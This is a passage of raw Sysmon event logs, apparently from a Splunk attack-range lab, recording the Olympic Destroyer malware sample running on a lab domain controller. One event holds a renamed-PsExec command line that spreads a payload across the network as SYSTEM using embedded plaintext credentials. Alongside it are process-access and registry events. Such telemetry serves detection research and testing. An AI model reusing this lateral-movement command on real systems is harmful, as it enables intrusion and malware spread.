10:56:45.797{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12ED-6216-7705-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.805{C8EA50B7-12ED-6216-7705-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.797{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12ED-6216-7705-000000003802}6996C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.797{C8EA50B7-12E9-6216-5105-000000003802}7004C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000291099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:45.781{C8EA50B7-12ED-6216-7505-000000003802}6740C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.713{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12ED-6216-7605-000000003802}6776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.713{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12ED-6216-7605-000000003802}6776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.697{C8EA50B7-12ED-6216-7605-000000003802}67765188C:\Windows\system32\conhost.exe{C8EA50B7-12ED-6216-7505-000000003802}6740C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.644{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12ED-6216-7605-000000003802}6776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.644{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12ED-6216-7605-000000003802}6776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217664Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.745{4F8D34B0-12ED-6216-8204-000000003902}8443448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000217663Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:42.709{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51410-false10.0.1.12-8000- 10341000x8000000000000000217662Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.511{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-12ED-6216-8204-000000003902}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217661Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.511{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217660Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.511{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217659Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.511{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217658Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.511{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217657Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.511{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217656Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.511{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217655Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.511{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217654Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.511{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217653Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.511{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217652Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.511{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-12ED-6216-8204-000000003902}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217651Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.511{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12ED-6216-8204-000000003902}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217650Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.512{4F8D34B0-12ED-6216-8204-000000003902}844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000291093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.501{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12ED-6216-7505-000000003802}6740C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.485{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.485{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.485{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.485{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.485{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12ED-6216-7505-000000003802}6740C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(